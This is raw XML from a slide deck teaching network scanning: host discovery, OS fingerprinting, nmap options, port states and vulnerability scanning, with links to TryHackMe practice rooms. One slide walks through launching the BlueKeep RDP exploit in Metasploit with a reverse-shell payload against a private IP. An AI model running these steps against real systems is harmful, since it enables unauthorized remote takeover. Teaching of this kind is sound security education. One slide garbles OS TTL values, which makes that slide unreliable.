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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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7bdd1ca7d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tryhackme.com/room/blue" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/furthernmap" TargetMode="External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Scanning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Meshack and Emily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819150" y="845600"/>
            <a:ext cx="75057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Port scanning for port and service discovery</a:t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757525" y="1404800"/>
            <a:ext cx="7505700" cy="32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-sV: Probe open ports to determine service/version info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-Pn: Treat all hosts as online -- skip host discovery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819150" y="845600"/>
            <a:ext cx="75057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Vulnerability scanning </a:t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757525" y="1404800"/>
            <a:ext cx="7505700" cy="32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Shows the presence of known weaknesses. Vulnerability scanning is a method for checking whether a system is exploitable by identifying its vulnerabilities.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A vulnerability can also be a zero day attack.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819150" y="845600"/>
            <a:ext cx="75057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Bluekeep RDP exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>using metasploit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757525" y="1404800"/>
            <a:ext cx="7505700" cy="32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A0A0A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msf &gt; use exploit/windows/rdp/cve_2019_0708_bluekeep_rce</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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msf exploit(cve_2019_0708_bluekeep_rce) &gt; show targets</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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    ...targets...</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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msf exploit(cve_2019_0708_bluekeep_rce) &gt; set TARGET 0</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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msf exploit(cve_2019_0708_bluekeep_rce) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="C41414"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EAEAED"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>set payload windows/x64/shell/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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msf exploit(cve_2019_0708_bluekeep_rce) &gt; show options</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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    ...show and set options…</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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msf exploit(cve_2019_0708_bluekeep_rce) &gt; set RHOST 192.168.125.100</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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msf exploit(cve_2019_0708_bluekeep_rce) &gt; set RPORT 3389</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0A0A0A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A0A0A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msf exploit(cve_2019_0708_bluekeep_rce) &gt; exploit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819150" y="845600"/>
            <a:ext cx="75057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practice purposes:</a:t>
            </a:r>
            <a:endParaRPr/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757525" y="1404800"/>
            <a:ext cx="7505700" cy="32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https://tryhackme.com/room/blue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https://tryhackme.com/room/furthernmap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525" y="2091648"/>
            <a:ext cx="6405124" cy="21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 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673575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Host discovery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OS discovery/Banner Grabbing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Port scanning for port and service discovery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Vulnerability scanning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to use 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Nmap(Man nmap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Metasploit </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142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672625" y="1445225"/>
            <a:ext cx="7505700" cy="32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 Scanning is the process of gathering detailed information about the target using reconnaissance techniques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Network scanning refers to a set of procedures used for identifying hosts, ports, and services running on a network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/>
              <a:t>Disclaimer:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" u="sng"/>
              <a:t>Only scan on neworks you allowed to</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600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512850"/>
            <a:ext cx="7505700" cy="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Three way Handshake </a:t>
            </a:r>
            <a:endParaRPr sz="1600"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775" y="987450"/>
            <a:ext cx="4073250" cy="34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658950" y="291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Host D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>iscovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> 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658950" y="832325"/>
            <a:ext cx="7505700" cy="42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GB" sz="1400"/>
              <a:t>Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t> is the technique used to identify  the active/live hosts in the network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GB" sz="1400"/>
              <a:t>             -sL: List Scan - simply list targets to scan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GB" sz="1400"/>
              <a:t>             -sn: Ping Scan - disable port scan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GB" sz="1400"/>
              <a:t>             -Pn: Treat all hosts as online -- skip host discovery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GB" sz="1400"/>
              <a:t>             -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports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GB" sz="1400"/>
              <a:t>             -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes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GB" sz="1400"/>
              <a:t>             -PO[protocol list]: IP Protocol Ping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GB" sz="1400"/>
              <a:t>             -n/-R: Never do DNS resolution/Always resolve [default: sometimes]      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GB" sz="1400"/>
              <a:t>             --traceroute: Trace hop path to each host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OS discovery/Banner Grabbing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745200" y="1239000"/>
            <a:ext cx="7505700" cy="33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Banner grabbing or OS fingerprinting is the method to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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determine the operating system running on a remote target system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There are two types of banner grabbing: active and passive..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 Banner Grabbing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Specially crafted packets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sent to remote OS and the responses are noted.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responses are then compared with a database to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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determine the OS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 from different OSes varies due to differences in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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TCP/IP stack implementation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Passive Banner Grabbing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Banner grabbing from error messages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Error messages provide information such as type of server, type of OS, and SSL tool used by the target remote system.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Sniffing the network traffic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Capturing and analyzing packets from the target enables an attacker to determine OS used by the remote system.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Banner grabbing from page extensions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Looking for an extension in the URL may assist in determining the application version. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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.aspx =&gt; IIS server and Windows platform.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OS Fingerprinting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695900" y="14978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Nmap -O &lt;iprange&gt;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-osscan-limit: Limit OS detection to promising targets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--osscan-guess: Guess OS more aggressively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Using TTL value of ping results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Eg 128 for windows and linux 68 for windows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845600"/>
            <a:ext cx="75057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Port scanning for port and service discovery</a:t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757525" y="1404800"/>
            <a:ext cx="7505700" cy="32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Port states recognised by nmap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Open-An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port.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Closed-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on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Filtered-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port.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Unfiltered-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed.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Open|filtered-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Nmap places ports in this state when it is unable to determine whether a port is open or filtered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closed|filtered-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Nmap places ports in this state when it is unable to determine whether a port is closed or filtered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